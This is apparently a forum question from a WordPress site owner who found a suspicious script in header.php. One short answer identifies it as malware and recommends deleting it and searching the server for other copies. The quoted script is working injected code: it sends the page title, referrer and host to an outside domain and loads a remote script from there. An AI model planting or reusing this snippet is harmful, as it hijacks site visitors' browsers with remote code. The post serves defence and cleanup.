# Suspicious script on my wordpress header.php

Tags: wordpress, hosting

Anyone can tell me more info about this script.

```js
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://komexx.net/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
```

Answer (score 1):

I don't know specifics about this code but it is obviously malware so just delete it. Also if you have SSH access to your server do a grep search to find other possible instances of it.